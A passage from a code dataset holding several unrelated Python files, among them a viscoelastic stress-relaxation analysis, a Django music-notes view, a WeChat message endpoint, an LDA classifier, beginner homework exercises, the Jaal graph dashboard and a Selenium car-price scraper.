'AC' measurement\nRi_t = data_ems.MAF(Ri_t,12)\n\n## Strain ##\n# Calc engineering strain from displacement\nStrain_eng_t = P_t/(spec_length) #dx/x\n# Calc true strain\nStrain_log_t = np.log((P_t+spec_length)/(spec_length))\n\n## Stress ##\n# Calc engineering stress\nA_0 = spec_width * spec_thickness # initial cross-sectional area\nStress_eng_t = F_t/A_0\n# Calc stress from force and changing cross-sectional area\n
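# As the specimen stretches, its cross-section shrinks by the Poisson effect, so true stress exceeds engineering stress in tension.\n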
poisson_ratio = 0.29 # Poisson's ratio. Found experimentally using #2_7.5%dragonskin10NV specimen\nA_t = ((spec_width*spec_thickness)*(-Strain_eng_t*poisson_ratio+1)*(-Strain_eng_t*poisson_ratio+1))\nStress_pois_t = F_t/A_t # My approximation of true stress, with Poisson's ratio\n# Common calc for the approximation of true stress\nStress_true_t = (F_t/A_0) * (1+Strain_eng_t)\n\n# Write interpolated and partially processed data to csv ##\n# data_ems.write_processed_data(input_filename, Ro_t, Ri_t, resistivity_t, Strain_eng_t, Strain_log_t, Stress_pois_t, Stress_eng_t, Stress_true_t, t_lin)\n## ^UN/COMMENT OUT WHEN NOT REQUIRED^ ##\n\n# Plot measurements over time\nfig1, axs1 = plt.subplots(3, 1, constrained_layout=True,figsize = (10, 12))\n\nax = axs1[0]\nax.plot(t_lin, Ri_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistance [Ohm]')\nax.grid(True)\n\nax = axs1[1]\nax.plot(t_lin, Stress_eng_t,'r-',t_lin, Stress_pois_t,'b-',t_lin, Stress_true_t,'g-')\nax.set_title('')\nax.legend((\"Eng\",\"Poisson\",\"True\"), loc='upper right')\nax.set_ylabel('Stress [Pa]')\nax.grid(True)\n\nax = axs1[2]\nax.plot(t_lin, Strain_eng_t,'r-',t_lin, Strain_log_t,'b-')\nax.set_title('')\nax.legend((\"Eng\",\"True\"), loc='upper right')\nax.set_ylabel('Strain')\nax.grid(True)\n\nax.set_xlabel('Time [s]')\n\n#%% Resistivity investigation\n\n## Resistivity calc ##\nresistivity_t = (Ri_t*A_t)/((1+Strain_log_t)*spec_length_inner_electrodes)\n\n# Plot measurements over time\nfig2, axs2 = plt.subplots(2, 1, constrained_layout=True,figsize = (10, 6))\n\nax = axs2[0]\nax.plot(t_lin, Ri_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistance [Ohm]')\nax.grid(True)\n\nax = axs2[1]\nax.plot(t_lin, resistivity_t,'r-')\nax.set_title('')\nax.set_ylabel('Resistivity [Ohm.m]') # Res-strain time delay may affect data significantly?\nax.grid(True)\n\n\n#%% Split data into separate pulses so each relaxation/loading-cycle can be analysed separately\n\nstrain_splits = data_ems.split_ramp_data(Strain_log_t)\nfor i in range(len(strain_splits)):\n print(t_lin[strain_splits[i]])\n\n# take chunks of stress and resistance relaxing values from index i1 to i2\ni1 = []\ni2 = []\nfor i in range(int(len(strain_splits)/4)):\n i1.append(int(4*i + 2))\n i2.append(int(4*i + 3))\n\n#%% Fitting a line to the stress-strain loading and unloading data\n\n# Plot relaxation and fit curve\n\n# Simple linear function to fit the stress-strain relationship\ndef lin_func(x,m,c):\n return m*x + c\n\nconsts_lin_fit = []\np_init = [1,1]\n\nconstsu_lin_fit = []\npu_init = [1,1]\n\nfig3, ax3 = plt.subplots(figsize=(12,6))\n# for i in range(1,int(len(strain_splits))):\nfor i in range(5):\n Strain_load = Strain_log_t[int(strain_splits[4*i+1]):int(strain_splits[4*i+2])] # Using log strain as a better representation of the strain of the material\n Strain_unload = Strain_log_t[int(strain_splits[4*i+3]):int(strain_splits[4*i+4])]\n\n Stress_load = Stress_pois_t[int(strain_splits[4*i+1]):int(strain_splits[4*i+2])]\n # Stress_load_min = np.min(Stress_load)\n # Stress_load = Stress_load - Stress_load_min\n Stress_unload = Stress_pois_t[int(strain_splits[4*i+3]):int(strain_splits[4*i+4])]\n # Stress_unload_min = np.min(Stress_load)\n # Stress_unload = Stress_load - Stress_load_min\n \n # Stress-strain loading fitting\n poptS, pcovS = optimize.curve_fit(lin_func, Strain_load, Stress_load, p0=p_init, maxfev=50000)\n p_init = poptS\n Strain_load_lin = np.linspace(min(Strain_load),max(Strain_load) , 100)\n Stress_load_lin = lin_func(Strain_load_lin,*poptS)\n consts_lin_fit.append(poptS) # Store fitted parameters of each loading fit\n
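 # The fitted slope m estimates the elastic modulus of the specimen over this strain range.\n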
 \n # Stress-strain unloading fitting\n poptSu, pcovSu = optimize.curve_fit(lin_func, Strain_unload, Stress_unload, p0=pu_init, maxfev=50000)\n pu_init = poptSu\n Strain_unload_lin = np.linspace(min(Strain_unload),max(Strain_unload) , 100)\n Stress_unload_lin = lin_func(Strain_unload_lin,*poptSu)\n constsu_lin_fit.append(poptSu) # Store fitted parameters of each unloading fit\n \n ## Plot stress-strain loading/unloading of specimen\n # fig3, ax3 = plt.subplots(figsize=(16,8))\n # Loading\n ax3.plot(100*Strain_load,Stress_load,color='r',marker='x',ls='')\n # ax3.plot(Strain_load_lin,Stress_load_lin,color='y',ls='-')\n # Unloading\n ax3.plot(100*Strain_unload,Stress_unload,color='b',marker='x',ls='')\n # ax3.plot(Strain_unload_lin,Stress_unload_lin,color='g',ls='-')\n ax3.legend([\"Loading\", \"Unloading\"])\n ax3.set_ylabel('Stress [Pa]')\n ax3.set_xlabel('Strain [%]')\n\n\n#%% Fitting models to the stress relaxation data\n\n# Curve fitting code (curve_fit func using non-lin lstsqr)\ne0 = .10 # We should be able to input the elastic modulus parameter found in the previous section\n\n# Viscoelastic models to fit data to \ndef SLS_relax(t,E1,E2,C,mu):\n return (E1*E2)/(E1+E2) * e0 + C*np.exp(-((E1+E2)/mu)*t)\n\ndef SLS_relax_simple(t,E1,E2,C,mu):\n return E1 * e0 + C*np.exp(-(E2/mu)*t)\n\ndef generalised_SLS_2e(x, a0, a1, tau_1, a2, tau_2): # generalised Kelvin SLS relaxation model for n = 2\n return a0 + a1 * np.exp(-x/tau_1) + a2 * np.exp(-x/tau_2) \n\ndef generalised_SLS_3e(x, a0, a1, tau_1, a2, tau_2, a3, tau_3): # generalised Kelvin SLS relaxation model for n = 3\n return a0 + a1 * np.exp(-x/tau_1) + a2 * np.exp(-x/tau_2) + a3 * np.exp(-x/tau_3)\n\n## Fit the stress relaxation single element SLS model\n\n# Stress modelling\nconsts_SLS = []\npSLS_init = [1,1,1,1] # initial guess of parameters\n\nstart_offset = 6 # index offset to compensate for time lag between strain change and resistance/stress\nend_offset = 1\n\nfor i in range(1,int(len(strain_splits)/4)): \n \n Strain_load = Strain_log_t[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n\n Stress_load = Stress_pois_t[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n Stress_load_min = np.min(Stress_load)\n Stress_load = Stress_load - Stress_load_min\n\n t_load = t_lin[int(strain_splits[i1[i]])+start_offset:int(strain_splits[i2[i]])-end_offset]\n t_load = t_load - t_load[0]\n \n ## Levenberg–Marquardt algorithm for non-linear leastsq, fitting the stress data to generalised SLS relaxation models\n # Stress fitting\n poptS_SLS, pcovS_SLS = optimize.curve_fit(SLS_relax_simple, t_load, Stress_load, p0=pSLS_init, maxfev=50000)\n \n pSLS_init = poptS_SLS # Have the next initial guess of the next relaxation equal the previous relaxation's fitted parameters\n \n # Make curve for fitted model\n t_load_lin = np.linspace(min(t_load),max(t_load) , 100)\n Stress_load_lin_SLS = SLS_relax_simple(t_load_lin,*poptS_SLS) + Stress_load_min\n poptS_SLS[0] = poptS_SLS[0] + Stress_load_min\n consts_SLS.append(poptS_SLS) # Store fitted parameters of each relaxation\n \n # Determine the goodness of fit\n Error = Stress_load - SLS_relax_simple(t_load,*poptS_SLS) + Stress_load_min\n \n fig4, ax4 = plt.subplots(figsize = (10, 5))\n ax4.plot(t_load,Error,'r-')\n ax4.set_xlabel('Time[s]')\n ax4.set_ylabel('Stress [Pa]',color='r')\n \n # Plot relaxation data against the fitted model\n fig5, ax5 = plt.subplots(figsize = (10, 5))\n ax5.plot(t_load,Stress_load + Stress_load_min,'rx',t_load_lin,Stress_load_lin_SLS,'y-')\n
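 # Overlay the measured relaxation samples (red x) with the fitted single-branch SLS curve (yellow).\n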
 ax5.set_xlabel('Time[s]')\n ax5.set_ylabel('Stress [Pa]',color='r')\n","sub_path":"stress_resistance_relaxation.py","file_name":"stress_resistance_relaxation.py","file_ext":"py","file_size_in_byte":8851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"273181155","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.4 (62061)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.3-fat/egg/schevo/meta.py\n# Compiled at: 2007-03-21 14:34:41\n\"\"\"Metaclasses.\n\nFor copyright, license, and warranty, see bottom of file.\n\"\"\"\nimport sys\nfrom schevo.lib import optimize\nfrom schevo.fieldspec import field_spec_from_class\nfrom schevo.label import label_from_name\nimport schevo.namespace\n\ndef schema_metaclass(namespace_name):\n \"\"\"Return a metaclass that adds subclasses to a namespace of a\n SchemaDefinition.\"\"\"\n\n class Meta(type):\n __module__ = __name__\n\n def __init__(cls, class_name, bases, class_dict):\n type.__init__(cls, class_name, bases, class_dict)\n if '_label' not in class_dict:\n cls._label = label_from_name(class_name)\n if schevo.namespace.SCHEMADEF is not None and hasattr(cls, '_field_spec'):\n cls._field_spec = field_spec_from_class(cls, class_dict)\n ns = getattr(schevo.namespace.SCHEMADEF, namespace_name)\n try:\n ns._set(class_name, cls)\n except KeyError:\n pass\n\n return\n\n return Meta\n\n\noptimize.bind_all(sys.modules[__name__])","sub_path":"pycfiles/Schevo-3.0-py2.4-macosx-10.3-fat/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"416155439","text":"# -*- coding: utf-8 -*-\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.template import RequestContext, loader\n\nimport achtelbass_web\nfrom locales_en import locales\nlocales_inverse = dict([[v,k] for k,v in locales.items()]) #CHANGEME do we even need this?\n\ndef index(request):\n template = loader.get_template('generate_notes/index.html')\n context = RequestContext(request, {})\n\n parameters = {'tonic' : request.POST.get('tonic', 'C'),\n 'mode' : request.POST.get('mode', 'Major'),\n 'grand_staff' : request.POST.get('grand_staff', False),\n 'chords_frequency' : request.POST.get('chords_frequency', 0),\n 'intervals' : request.POST.getlist('intervals', ['Second']),\n 'inversion' : False,\n 'min_pitch' : request.POST.get('min_pitch', 'C'),\n 'max_pitch' : request.POST.get('max_pitch', 'c'),\n 'rest_frequency' : request.POST.get('rest_frequency', 0),\n 'time_signature' : request.POST.get('time_signature','4/4'),\n 'note_values' : request.POST.getlist('note_values', ['1', '1/2', '1/4']),\n 'tuplets' : request.POST.getlist('tuplets', [0]),\n 'tuplet_same_pitch' : False,\n 'tuplets_frequency' : request.POST.get('tuplets_frequency',0),\n 'prolongations' : False,\n 'prolongations_frequency' : 0,\n 'bpm' : 60,\n 'tempo' : 'andante',\n }\n \n \n achtelbass_obj = achtelbass_web.Achtelbass(parameters, locales)\n \n context.__dict__.update(achtelbass_obj.__dict__)\n \n context.preselected = parameters\n\n context.note_value_symbols = {\n '1' : u'𝅝',\n '1/2' : u'𝅗𝅥',\n '1/4' : u'♩',\n '1/8' : u'♪',\n '1/16' : u'𝅘𝅥𝅯',\n '1/32' : u'𝅘𝅥𝅰',\n '1/64' : u'𝅘𝅥𝅱',\n }\n\n context.note_value_names = achtelbass_obj.Note_Names\n \n context.generated_notes = achtelbass_obj.display()\n \n return HttpResponse(template.render(context))\n
","sub_path":"generate_notes/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"611639979","text":"# encoding=utf-8\nimport hashlib\nimport time\nimport xmltodict\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.utils.encoding import smart_str\n\n\n# Create your views here\nWEIXIN_TOKEN = 'youpeixuetang'\ndef dingyue(request):\n '''Verify the WeChat server signature on GET requests; echo received text messages back on POST.'''\n if request.method == \"GET\":\n signature = request.GET.get(\"signature\", None)\n timestamp = request.GET.get(\"timestamp\", None)\n nonce = request.GET.get(\"nonce\", None)\n echostr = request.GET.get(\"echostr\", None)\n token = WEIXIN_TOKEN\n tmp_list = [token, timestamp, nonce]\n tmp_list.sort()\n tmp_str = \"%s%s%s\" % tuple(tmp_list)\n tmp_str = hashlib.sha1(tmp_str.encode('utf-8')).hexdigest()\n if tmp_str == signature:\n return HttpResponse(echostr)\n else:\n return HttpResponse(\"weixin index\")\n else:\n xml_str = smart_str(request.body)\n req = xmltodict.parse(xml_str)['xml']\n #response_xml = auto_reply_main(request_xml) # \n\n if \"text\" == req.get(\"MsgType\"):\n resp = {\n \"ToUserName\": req.get(\"FromUserName\", \"\"),\n \"FromUserName\": req.get(\"ToUserName\", \"\"),\n \"CreateTime\": int(time.time()),\n \"MsgType\": \"text\",\n \"Content\": req.get(\"Content\", \"\")\n }\n else:\n resp = {\n \"ToUserName\": req.get(\"FromUserName\", \"\"),\n \"FromUserName\": req.get(\"ToUserName\", \"\"),\n \"CreateTime\": int(time.time()),\n \"MsgType\": \"text\",\n \"Content\": \"I love you, itcast!\"\n }\n response_xml = xmltodict.unparse({\"xml\": resp})\n return HttpResponse(response_xml)\n","sub_path":"youpeixuetang/weixin/dingyue/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"543449554","text":"import numpy as np\nfrom math import log\n\nclass LDA_Classifier(object):\n\n\tdef __init__(self):\n\t\tself.epsilon = 0.00001 #ridge term to keep the covariance invertible\n\n\tdef train(self, X_train, Y_train):\n\t\t\"\"\"Train the classifier. Compute the empirical covariances and means for each class, and the class priors.\"\"\"\n
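\t\t# The pooled covariance is accumulated as a prior-weighted sum of the per-class covariances.\n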
\n\t\td = X_train.shape[1]\n\t\tY_train = np.reshape(Y_train, (Y_train.size))\n\n\t\tself.class_ids, counts = np.unique(Y_train, return_counts = True)\n\t\tself.class_means = {}\n\t\tself.class_priors = {}\n\t\tself.cov = np.zeros((d, d))\n\t\t\n\t\tfor i in range(self.class_ids.size):\n\t\t\tclass_id = self.class_ids[i]\n\n\t\t\tclass_data = X_train[Y_train == class_id, :]\n\t\t\tclass_mean = np.reshape(np.mean(class_data, axis=0), (1, d))\n\t\t\tclass_cov = (1.0/class_data.shape[0])*(class_data - class_mean).T @ (class_data - class_mean)\n\t\t\t#print(class_cov)\n\t\t\tself.class_means[class_id] = class_mean\n\t\t\tself.class_priors[class_id] = counts[i]/np.sum(counts)\n\t\t\tself.cov = self.cov + class_cov*self.class_priors[class_id]\n\t\treturn None\n\n\tdef predict(self, X_test):\n\t\t\"\"\"Predict labels for test data using this classifier.\"\"\"\n\t\tn_test = X_test.shape[0]\n\t\td = X_test.shape[1]\n\n\t\tscores = None\n\t\tfor i in range(self.class_ids.size):\n\t\t\tclass_id = self.class_ids[i]\n\t\t\tmu = self.class_means[class_id]\n\t\t\tprior = self.class_priors[class_id]\n\n\t\t\tscore = (-1.0/2)*np.diag((X_test - mu) @ np.linalg.inv(self.cov + np.eye(self.cov.shape[0])*self.epsilon) @ (X_test - mu).T) + log(prior)\n\t\t\tscore = np.reshape(score, (n_test, 1))\n\n\t\t\tif i == 0:\n\t\t\t\tscores = score\n\t\t\telse:\n\t\t\t\tscores = np.hstack((scores, score))\n\n\t\tY_hat = self.class_ids[np.argmax(scores, axis = 1)]\n\t\treturn Y_hat\n\ndef main():\n\tpass\n\t# lda_classifier = LDA_Classifier()\n\n\t# X_train = np.random.rand(20, 30)*10\n\t# y_train = np.random.randint(0, 2, (20, 1))\n\t# X_test = np.random.rand(10, 30)*10\n\n\t# lda_classifier.train(X_train, y_train)\n\t# y_hat = lda_classifier.predict(X_test)\n\t# print(y_hat)\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"195219155","text":"# Task 1:\n# Given a list filled with arbitrary integers, build a new list whose\n# elements are the square roots of the elements of the original list,\n# but only when the root has no fractional part and\n# when the root can be taken at all\n# Example: Given: [2, -5, 8, 9, -25, 25, 4] Result: [3, 5, 2]\n\n'''from random import randint\nimport math\n\nn = int(input(\"Enter the number of elements for a random list of integers = \"))\nlist_n = []\nsq_list = []\ni_list = []\nnew_list = []\nfor i in range(n):\n list_n.append(randint(0, 100))\n sq_list.append(math.sqrt(list_n[i]))\n if sq_list[i].is_integer():\n i_list.append(i)\n print(i, \"-th element meets the task conditions\")\n new_list.append(sq_list[i])\n\nprint(\"Random list of integers = \", list_n)\nprint(\"New list\", new_list)'''\n\nimport math\nmy_list = [2, -5, 8, 9, -25, 25, 4]\nnew_list = []\nfor element in my_list:\n if (element > 0) and (int(math.sqrt(element)) == math.sqrt(element)):\n new_list.append(int(math.sqrt(element)))\nprint(new_list)\n\n\n# Task 2: A date is given in dd.mm.yyyy format, e.g.: 02.11.2013.\n# Your task is to print the date as text, e.g.: \"второе ноября 2013 года\" (\"the second of November 2013\").\n# Declension may be ignored (2000 года, 2010 года)\n\ndana_data = '04.12.2014'\ndata_list = dana_data.split('.')\n
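# The look-up tables below map zero-padded day and month numbers to their spelled-out Russian forms.\n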
dict_months = {\n'01':'января','02':'февраля','03':'марта','04':'апреля','05':'мая','06':'июня','07':'июля','08':'августа','09':'сентября',\n'10':'октября','11':'ноября','12':'декабря',\n}\ndict_days = {\n'01': 'первое', '02': 'второе', '03': 'третье', '04': 'четвёртое', '05': 'пятое',\n'06': 'шестое', '07': 'седьмое', '08': 'восьмое', '09': 'девятое', '10': 'десятое',\n'11': 'одиннадцатое', '12': 'двенадцатое', '13': 'тринадцатое', '14': 'четырнадцатое', '15': 'пятнадцатое',\n'16': 'шестнадцатое', '17': 'семнадцатое', '18': 'восемнадцатое', '19': 'девятнадцатое', '20': 'двадцатое',\n'21': 'двадцать первое', '22': 'двадцать второе', '23': 'двадцать третье', '24': 'двадцать четвёртое',\n'25': 'двадцать пятое', '26': 'двадцать шестое', '27': 'двадцать седьмое', '28': 'двадцать восьмое',\n'29': 'двадцать девятое', '30': 'тридцатое', '31': 'тридцать первое',\n}\nfor key in dict_days:\n if data_list[0] == key:\n data_list[0] = dict_days[key]\n\nfor key in dict_months:\n if data_list[1] == key:\n data_list[1] = dict_months[key]\n\n#answer_data = data_list[0] + ' ' + data_list[1] + ' ' + data_list[2] + ' ' \"года\"\n#print(answer_data)\nprint(\"{} {} {} года\" .format(data_list[0], data_list[1], data_list[2]))\n\n# Task 3: Write an algorithm that fills a list with random integers\n# in the range -100 to 100. The list must contain n elements.\n# Hint:\n# use the randint() function from the random module to get a random number\n\nfrom random import randint\n\nn = int(input(\"Enter the number of list elements = \"))\nlist_n = []\nfor i in range(n):\n list_n.append(randint(-100, 100))\n\nprint(\"Random list of integers = \", list_n)\n\nimport random\nn = int(input('Enter the number of random items in the list '))\nmy_list = []\nfor el in range(n):\n my_list.append(random.randint(-100, 100))\nprint(my_list)\n\n\n# Task 4: A list filled with arbitrary integers is given.\n# Build a new list whose elements are: \n# a) the distinct elements of the original list:\n# e.g. lst = [1, 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 2, 4, 5, 6]\n# b) the elements of the original list that have no repeats:\n# e.g. lst = [1 , 2, 4, 5, 6, 2, 5, 2] should give lst2 = [1, 4, 6]\n# Solution a)\n\nlst1 = [1, 2, 4, 5, 6, 2, 5, 5, 2, 2]\nprint(\"Given a list filled with random integers = \", lst1)\nlst2 = []\nlst3 = []\nfor i in lst1:\n if i not in lst2:\n lst2.append(i)\nprint(\"New list of distinct elements of the original list = \", lst2)\nfor i in lst1:\n if lst1.count(i) == 1:\n lst3.append(i)\nprint(\"New list with only the non-repeating elements = \", lst3)\n\n\nmy_list = [1, 2, 4, 5, 6, 2, 5, 2]\nnew_list = set(my_list)\nprint(new_list)\n# Solution b)\nnext_list = []\nfor item in my_list:\n if my_list.count(item) == 1:\n next_list.append(item)\nprint(next_list)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"lesson02/home_work/hw02_normal.py","file_name":"hw02_normal.py","file_ext":"py","file_size_in_byte":5706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462899134","text":"\"\"\"\nAuthor: Mohit Mayank\n\nMain class for Jaal network visualization dashboard\n\"\"\"\n# import\nimport dash\nimport visdcc\nimport pandas as pd\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nfrom dash.exceptions import PreventUpdate\nfrom dash.dependencies import Input, Output, State\nfrom .datasets.parse_dataframe import parse_dataframe\n
from .layout import get_app_layout, get_distinct_colors, create_color_legend, DEFAULT_COLOR\n\n# class\nclass Jaal:\n \"\"\"The main visualization class\n \"\"\"\n def __init__(self, edge_df, node_df=None):\n \"\"\"\n Parameters\n -------------\n edge_df: pandas dataframe\n The network edge data stored in format of pandas dataframe\n\n node_df: pandas dataframe (optional)\n The network node data stored in format of pandas dataframe\n \"\"\"\n print(\"Parsing the data...\", end=\"\")\n self.data = parse_dataframe(edge_df, node_df)\n self.filtered_data = self.data.copy()\n self.node_value_color_mapping = {}\n self.edge_value_color_mapping = {}\n print(\"Done\")\n\n def _callback_search_graph(self, graph_data, search_text):\n \"\"\"Highlight the nodes which match the search text\n \"\"\"\n nodes = graph_data['nodes']\n for node in nodes:\n if search_text not in node['label'].lower():\n node['color'] = '#f4f8fe'\n else:\n node['color'] = DEFAULT_COLOR\n graph_data['nodes'] = nodes\n return graph_data\n\n def _callback_filter_nodes(self, graph_data, filter_nodes_text):\n \"\"\"Filter the displayed nodes with a pandas query string over the node dataframe.\n \"\"\"\n self.filtered_data = self.data.copy()\n node_df = pd.DataFrame(self.filtered_data['nodes'])\n try:\n node_list = node_df.query(filter_nodes_text)['id'].tolist()\n nodes = []\n for node in self.filtered_data['nodes']:\n if node['id'] in node_list:\n nodes.append(node)\n self.filtered_data['nodes'] = nodes\n graph_data = self.filtered_data\n except Exception:\n graph_data = self.data\n print(\"wrong node filter query!!\")\n return graph_data\n\n def _callback_filter_edges(self, graph_data, filter_edges_text):\n \"\"\"Filter the displayed edges with a pandas query string over the edge dataframe.\n \"\"\"\n self.filtered_data = self.data.copy()\n edges_df = pd.DataFrame(self.filtered_data['edges'])\n try:\n edges_list = edges_df.query(filter_edges_text)['id'].tolist()\n edges = []\n for edge in self.filtered_data['edges']:\n if edge['id'] in edges_list:\n edges.append(edge)\n self.filtered_data['edges'] = edges\n graph_data = self.filtered_data\n except Exception:\n graph_data = self.data\n print(\"wrong edge filter query!!\")\n return graph_data\n\n def _callback_color_nodes(self, graph_data, color_nodes_value):\n value_color_mapping = {}\n # color option is None, revert back all changes\n if color_nodes_value == 'None':\n # revert to default color\n for node in self.data['nodes']:\n node['color'] = DEFAULT_COLOR\n else:\n print(\"inside color node\", color_nodes_value)\n unique_values = pd.DataFrame(self.data['nodes'])[color_nodes_value].unique()\n colors = get_distinct_colors(len(unique_values))\n value_color_mapping = {x:y for x, y in zip(unique_values, colors)}\n for node in self.data['nodes']:\n node['color'] = value_color_mapping[node[color_nodes_value]]\n # filter the data currently shown\n filtered_nodes = [x['id'] for x in self.filtered_data['nodes']]\n self.filtered_data['nodes'] = [x for x in self.data['nodes'] if x['id'] in filtered_nodes]\n graph_data = self.filtered_data\n return graph_data, value_color_mapping\n\n def _callback_color_edges(self, graph_data, color_edges_value):\n value_color_mapping = {}\n # color option is None, revert back all changes\n if color_edges_value == 'None':\n # revert to default color\n for edge in self.data['edges']:\n edge['color']['color'] = DEFAULT_COLOR\n else:\n print(\"inside color edge\", color_edges_value)\n unique_values = pd.DataFrame(self.data['edges'])[color_edges_value].unique()\n colors = get_distinct_colors(len(unique_values))\n value_color_mapping = {x:y for x, y in zip(unique_values, colors)}\n for edge in self.data['edges']:\n edge['color']['color'] = 
value_color_mapping[edge[color_edges_value]]\n # filter the data currently shown\n filtered_edges = [x['id'] for x in self.filtered_data['edges']]\n self.filtered_data['edges'] = [x for x in self.data['edges'] if x['id'] in filtered_edges]\n graph_data = self.filtered_data\n return graph_data, value_color_mapping\n\n def get_color_popover_legend_children(self, node_value_color_mapping={}, edge_value_color_mapping={}):\n \"\"\"Get the popover legends for node and edge based on the color setting\n \"\"\"\n # var\n popover_legend_children = []\n\n # common function\n def create_legends_for(title=\"Node\", legends={}):\n # add title\n _popover_legend_children = [dbc.PopoverHeader(f\"{title} legends\")]\n # add values if present\n if len(legends) > 0:\n for key, value in legends.items():\n _popover_legend_children.append(\n # dbc.PopoverBody(f\"Key: {key}, Value: {value}\")\n create_color_legend(key, value)\n )\n else: # otherwise add filler\n _popover_legend_children.append(dbc.PopoverBody(f\"no {title.lower()} colored!\"))\n #\n return _popover_legend_children\n\n # add node color legends\n popover_legend_children.extend(create_legends_for(\"Node\", node_value_color_mapping))\n # add edge color legends\n popover_legend_children.extend(create_legends_for(\"Edge\", edge_value_color_mapping))\n #\n return popover_legend_children\n\n def plot(self, debug=False, host=\"127.0.0.1\", port=\"8050\", directed=False, vis_opts=None):\n \"\"\"Plot the network by running the Dash server\n\n Parameter\n ----------\n debug (boolean)\n run the debug instance of Dash?\n\n host: string\n ip address on which to run the dash server (default: 127.0.0.1)\n\n port: string\n port on which to expose the dash server (default: 8050)\n\n directed: boolean\n process the graph as directed graph?\n \"\"\"\n # create the app\n app = dash.Dash(external_stylesheets=[dbc.themes.BOOTSTRAP])\n\n # define layout\n app.layout = get_app_layout(self.data, color_legends=self.get_color_popover_legend_children(), directed=directed, vis_opts=vis_opts)\n\n # create callbacks to toggle legend popover\n @app.callback(\n Output(\"color-legend-popup\", \"is_open\"),\n [Input(\"color-legend-toggle\", \"n_clicks\")],\n [State(\"color-legend-popup\", \"is_open\")],\n )\n def toggle_popover(n, is_open):\n if n:\n return not is_open\n return is_open\n\n # create the main callbacks\n @app.callback(\n [Output('graph', 'data'), Output('color-legend-popup', 'children')],\n [Input('search_graph', 'value'),\n Input('filter_nodes', 'value'),\n Input('filter_edges', 'value'),\n Input('color_nodes', 'value'),\n Input('color_edges', 'value')],\n state=State('graph', 'data')\n )\n def setting_pane_callback(search_text, filter_nodes_text, filter_edges_text, color_nodes_value, color_edges_value, graph_data):\n # fetch the id of option which triggered\n ctx = dash.callback_context\n # if its the first call\n if not ctx.triggered:\n print(\"No trigger\")\n return [self.data, self.get_color_popover_legend_children()]\n else:\n # find the id of the option which was triggered\n input_id = ctx.triggered[0]['prop_id'].split('.')[0]\n # perform operation in case of search graph option\n if input_id == \"search_graph\":\n graph_data = self._callback_search_graph(graph_data, search_text)\n # In case filter nodes was triggered\n elif input_id == 'filter_nodes':\n graph_data = self._callback_filter_nodes(graph_data, filter_nodes_text)\n # In case filter edges was triggered\n elif input_id == 'filter_edges':\n graph_data = self._callback_filter_edges(graph_data, 
filter_edges_text)\n # If color node text is provided\n if input_id == 'color_nodes':\n graph_data, self.node_value_color_mapping = self._callback_color_nodes(graph_data, color_nodes_value)\n # If color edge text is provided\n if input_id == 'color_edges':\n graph_data, self.edge_value_color_mapping = self._callback_color_edges(graph_data, color_edges_value)\n # create the color legend childrens\n color_popover_legend_children = self.get_color_popover_legend_children(self.node_value_color_mapping, self.edge_value_color_mapping)\n # finally return the modified data\n return [graph_data, color_popover_legend_children]\n # run the server\n app.run_server(debug=debug, host=host, port=port)\n","sub_path":"jaal/jaal.py","file_name":"jaal.py","file_ext":"py","file_size_in_byte":9818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"495712809","text":"'''\nCreated on July 10, 2020\n@author: DNP Enterprises Inc.\n'''\nfrom datetime import datetime\nfrom time import sleep\nimport re\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom Quotes.Excel_utils2 import Excel_utils2\nfrom Cars.CreateDealerSheet2 import CreateDealerSheet\n\nif __name__ == '__main__':\n file_in = 'C:/Users/Home/Desktop/Cars/CarData.xlsx'\n file_out = 'C:/Users/Home/Desktop/Cars/Ford/CarPrices-DonWayFord.xlsx'\n data_in = Excel_utils2(file_in, 'FordDealers', 'in')\n dealer = data_in.sht.cell(3,1).value\n url = data_in.sht.cell(3,2).value\n #url = \"https://www.donwayford.com/vehicles/used/?st=year,desc&view=grid&sc=used\"\n \n date_time = datetime.now().strftime('%Y-%B-%d %I:%M %p') # get the date and time\n data_out = Excel_utils2(' ', dealer, 'out') # set the spreadsheet tab to the dealer name\n\n browser = \"C:\\\\Selenium\\\\chromedriver.exe\"\n chrome_options = webdriver.ChromeOptions()\n chrome_options.add_argument(\"--incognito\")\n driver = webdriver.Chrome(browser) # Open Chrome\n driver.maximize_window() # maximize the browser window\n \n driver.get(url) # Navigate to the test website\n WebDriverWait(driver, 5).until(EC.presence_of_element_located((By.CSS_SELECTOR, \".srp__found-header\")))\n print (driver.title)\n num_cars = driver.find_element_by_css_selector(\".srp__found-header\").text\n num_cars = int(re.sub(\"[^0-9]\", \"\", num_cars)) #remove text, keep the numeric part, and convert to integer for later use\n print (\"Number of cars found on site: \" , num_cars)\n \n for scroll in range(5):\n driver.execute_script(\"window.scrollTo(0, 